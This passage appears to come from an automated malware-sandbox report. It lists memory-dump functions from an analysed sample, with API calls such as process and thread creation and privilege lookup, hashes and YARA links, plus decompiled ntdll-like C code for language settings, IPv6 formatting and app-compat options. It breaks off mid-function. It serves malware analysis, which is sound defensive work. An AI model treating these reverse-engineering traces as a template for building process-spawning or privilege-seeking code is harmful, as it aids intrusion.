Uniqueness Score: -1.00%

Function 00098530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: c59b42b6632d0895df0417b4e2b9a8becf80424f8c64f19b9aee7e8aff47414d
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 8101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00097000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction ID: a2835ed8a1f02e86942637865c72b5d80b13372240ffd3b5ea69fe5af6331005
Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction Fuzzy Hash: 9CE06D333902043AE7306599AC02FE7B29C8B81B20F140026FB0DEA2C2D595F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 000984F2, Relevance: 1.5, APIs: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 119fa6c288c5444f4f703ee2413d1754985441375ee1e018d3993cdfaaab9937
Instruction ID: 9ce0de743c0a5200b1dcc6f7fdc4054a8bfd50b7e5e0595bee89ce3a812d8eb3
Opcode Fuzzy Hash: 119fa6c288c5444f4f703ee2413d1754985441375ee1e018d3993cdfaaab9937
Instruction Fuzzy Hash: E2F017B2204409ABDB08CF98D890CE777AAEF9C700B618688FA4C87106D631E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: fbdf59b571a901eefcdfcf86bfa9680329d111587b15b1f5142f710709a765f9
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 02E012B1200208ABDB14EF99CC41EE777ACAF88650F118558BA089B382CA30F9108BF0

Uniqueness

Uniqueness Score: -1.00%

Function 00098620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 41ec7ab19a1a1cfe3868940f58b4777f3bcdd06e05e8724f7211c0fc3ae12589
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 25E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857342C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008D3F8, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 63aa4ee372e8d54d63c0e2436a5c9361a7a78862cddc019a377d774ac8102fc4
Instruction ID: 072aa6916b32993d9a7f785b33f4fd3596adf85954512d64933c688425f06a7f
Opcode Fuzzy Hash: 63aa4ee372e8d54d63c0e2436a5c9361a7a78862cddc019a377d774ac8102fc4
Instruction Fuzzy Hash: 74D02EE12AC3003EEB20BAB05C03B472B082B02350F0A41A9F488FB0C3CA48C1166232

Uniqueness

Uniqueness Score: -1.00%

Function 0008D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: c1cfe86d0508fd5e1fbc3651e45fb5d487ddecafc616ea5c1bf8ba266a155821
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: E9D0A7717903043BEA10FAA49C03F6733CDAB44B00F494064F948D73C3D960F9004561

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02598788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02598788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02598460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0257E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0259718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02598460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0257E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0259718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02598460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02598460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02598460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0257E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0257E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0259718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0257E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02572340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0258E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0257E2A8(_t322,  &_v68, _v16);
								if(E02595553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0258E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0257E2A8(_t322,  &_v68, _t236);
								if(E02595553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0257E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0257E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0259718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0257E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02572340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0258E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0257E2A8(_v12,  &_v68, _v16);
							if(E02595553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0258E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0257E2A8(_t322,  &_v68, _t269);
							if(E02595553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0257E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0257E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0259718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0257E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02572340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0258E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0257E2A8(_v12,  &_v68, _v16);
						if(E02595553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0258E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0257E2A8(_t322,  &_v68, _t296);
						if(E02595553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0257E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0257E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x02598788
0x02598788
0x02598791
0x02598794
0x02598798
0x0259879b
0x0259879e
0x025987a1
0x025987a4
0x025987a7
0x025987aa
0x025987af
0x025e1ad3
0x02598b0a
0x02598b0d
0x02598b13
0x02598b19
0x02598b1f
0x02598b25
0x02598b2b
0x02598b31
0x02598b37
0x02598b3d
0x02598b46
0x02598b46
0x025987c6
0x025987d0
0x025e1ae0
0x025e1ae6
0x025e1af8
0x025e1af8
0x025e1afd
0x025e1afe
0x025e1b01
0x025e1b06
0x025e1b06
0x025987d6
0x025987f2
0x025987f7
0x02598807
0x0259880a
0x0259880f
0x02598810
0x02598813
0x02598818
0x02598818
0x0259882c
0x02598831
0x02598838
0x02598908
0x02598920
0x025989f0
0x02598a08
0x02598af6
0x02598af6
0x02598af8
0x02598afb
0x025e1beb
0x025e1beb
0x02598b04
0x025e1bf8
0x025e1c0e
0x025e1c13
0x025e1c16
0x025e1c16
0x025e1bf8
0x00000000
0x02598b04
0x02598a0e
0x02598a11
0x02598a14
0x02598a15
0x02598a18
0x02598a22
0x02598b59
0x02598a28
0x02598a3c
0x02598a3c
0x02598a42
0x025e1bb0
0x025e1b11
0x025e1b11
0x00000000
0x02598a48
0x02598a51
0x02598a5b
0x02598a5e
0x02598a61
0x02598a69
0x02598a69
0x02598a6d
0x00000000
0x00000000
0x02598a74
0x02598a7c
0x02598a7d
0x02598a91
0x02598a93
0x02598a93
0x02598a98
0x02598a9b
0x02598aa1
0x02598aa1
0x02598aa4
0x02598aaa
0x02598ab1
0x02598ac5
0x02598ac7
0x02598ac7
0x02598ac5
0x02598ace
0x025e1bc9
0x025e1bce
0x025e1bd2
0x025e1bd2
0x02598ad8
0x02598aeb
0x02598aeb
0x02598af0
0x02598af4
0x00000000
0x02598af4
0x02598a42
0x02598926
0x02598929
0x0259892c
0x0259892d
0x02598930
0x02598935
0x0259893a
0x02598b51
0x02598940
0x02598954
0x02598954
0x0259895a
0x025e1b63
0x00000000
0x02598960
0x02598969
0x02598973
0x02598976
0x02598979
0x0259897e
0x02598981
0x02598981
0x02598986
0x00000000
0x00000000
0x025e1b6e
0x025e1b74
0x025e1b7b
0x025e1b8f
0x025e1b91
0x025e1b91
0x025e1b99
0x025e1b9c
0x025e1ba2
0x025e1ba2
0x0259898c
0x02598992
0x02598999
0x025989ad
0x025e1ba8
0x025e1ba8
0x025989ad
0x025989b6
0x025989c8
0x025989cd
0x025989d0
0x025989d0
0x025989d6
0x025989e8
0x025989e8
0x025989ed
0x00000000
0x025989ed
0x0259895a
0x0259883e
0x02598841
0x02598844
0x02598845
0x02598848
0x0259884d
0x02598852
0x02598b49
0x02598858
0x0259886c
0x0259886c
0x02598872
0x025e1b0e
0x00000000
0x02598878
0x02598881
0x0259888b
0x0259888e
0x02598891
0x02598896
0x02598899
0x02598899
0x0259889e
0x00000000
0x00000000
0x025e1b21
0x025e1b27
0x025e1b2e
0x025e1b42
0x025e1b44
0x025e1b44
0x025e1b4c
0x025e1b4f
0x025e1b55
0x025e1b55
0x025988a4
0x025988aa
0x025988b1
0x025988c5
0x025e1b5b
0x025e1b5b
0x025988c5
0x025988ce
0x025988e0
0x025988e5
0x025988e8
0x025988e8
0x025988ee
0x02598900
0x02598900
0x02598905
0x00000000
0x02598905

APIs

_wcspbrk.LIBCMT ref: 02598891
_wcspbrk.LIBCMT ref: 02598979
_wcspbrk.LIBCMT ref: 02598A61
_wcspbrk.LIBCMT ref: 02598A9B
_wcspbrk.LIBCMT ref: 025E1B9C

Strings

Kernel-MUI-Language-Allowed, xrefs: 02598827
WindowsExcludedProcs, xrefs: 025987C1
Kernel-MUI-Language-SKU, xrefs: 025989FC
Kernel-MUI-Number-Allowed, xrefs: 025987E6
Kernel-MUI-Language-Disallowed, xrefs: 02598914

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: c4f85f10415486279d6b28d1568462405a06e36e648e6bbe96ae43f93f408699
Instruction ID: b564a86fde8e722d529ac5458ffe3dd2a87785be3364ca32aae58099841b1216
Opcode Fuzzy Hash: c4f85f10415486279d6b28d1568462405a06e36e648e6bbe96ae43f93f408699
Instruction Fuzzy Hash: 47F1E4B2D0020AEFCF11DF95C985EEEBBB9BF49304F14446AE505A7210E734AA45DF68

Uniqueness

Uniqueness Score: -1.00%

Function 025B13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E025B13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E025A7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2572926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E025A7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2579cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E025A7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E025A7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E025A7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E025A7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x025b13d5
0x025b13d9
0x025b13dc
0x025b13de
0x025b13e1
0x025b13e8
0x025b13ee
0x025de8fd
0x00000000
0x025de921
0x025de921
0x025de928
0x025de982
0x025de98a
0x00000000
0x025de99a
0x025de99e
0x025de9a3
0x025de9a8
0x025de9b9
0x025de978
0x00000000
0x025de978
0x025de98a
0x025de92a
0x025de931
0x025de944
0x025de944
0x025de950
0x025de954
0x025de959
0x025de95e
0x025de963
0x025de970
0x00000000
0x025de975
0x025de93b
0x025de980
0x00000000
0x025de980
0x025de942
0x025de94b
0x00000000
0x025de94b
0x00000000
0x025de942
0x025b13f4
0x025b13f4
0x025b13f9
0x025b13fc
0x025b13ff
0x025b1406
0x025de9cc
0x025de9d2
0x025de9d2
0x025de9cc
0x025b140c
0x025b1411
0x025b1431
0x025b143a
0x025b143c
0x025b143f
0x025b143f
0x025b1442
0x025b1447
0x025b14a8
0x025b14ac
0x025de9e2
0x025de9e7
0x025de9ec
0x025dea05
0x025dea05
0x00000000
0x025b1449
0x00000000
0x025b1449
0x025b144c
0x025b1459
0x025b1462
0x025b1469
0x025b146a
0x025b1470
0x025b1473
0x025b1476
0x025b1476
0x025b1490
0x025b1495
0x025b138e
0x025b1390
0x025b1397
0x025b1398
0x025b1399
0x025b13a1
0x025b13a4
0x025b13a4
0x025b1498
0x025b149c
0x025b149f
0x025b14a2
0x00000000
0x00000000
0x025b14a4
0x00000000
0x025b14a4
0x025b1413
0x025b1415
0x025b1416
0x025b1419
0x025b141c
0x025b1422
0x025b13b7
0x025b13bc
0x025b13bf
0x025b13bf
0x025b13c2
0x025b1424
0x025b1424
0x025b1424
0x025b1427
0x025b142b
0x025b142c
0x025b142c
0x025b142c
0x00000000
0x025b141c
0x025b1411

APIs

___swprintf_l.LIBCMT ref: 025B146B
___swprintf_l.LIBCMT ref: 025B1490
___swprintf_l.LIBCMT ref: 025DE970

Strings

::%hs%u.%u.%u.%u, xrefs: 025DE967
::ffff:0:%u.%u.%u.%u, xrefs: 025DE9B0
:%u.%u.%u.%u, xrefs: 025DE9F4
ffff:, xrefs: 025DE94B

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: bfaeed65ead09f2ed60a147c6fb689eb3a364f285de78989b47164b4af6f6e83
Instruction ID: d663fbd746f5172af59c57af9598099bbb7f2ad12deb5114dacf9bf64f3b6768
Opcode Fuzzy Hash: bfaeed65ead09f2ed60a147c6fb689eb3a364f285de78989b47164b4af6f6e83
Instruction Fuzzy Hash: 896102B1910A56AADF75CF5DC8A09FFBFB6FF84300B14C42DE49A46640E734A640CB68

Uniqueness

Uniqueness Score: -1.00%

Function 025A7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E025A7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2652088; // 0x77690715
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E025A7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E025C3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0257DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2654218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E025C3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02580D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E025C3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02588375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E025C3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E025EE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
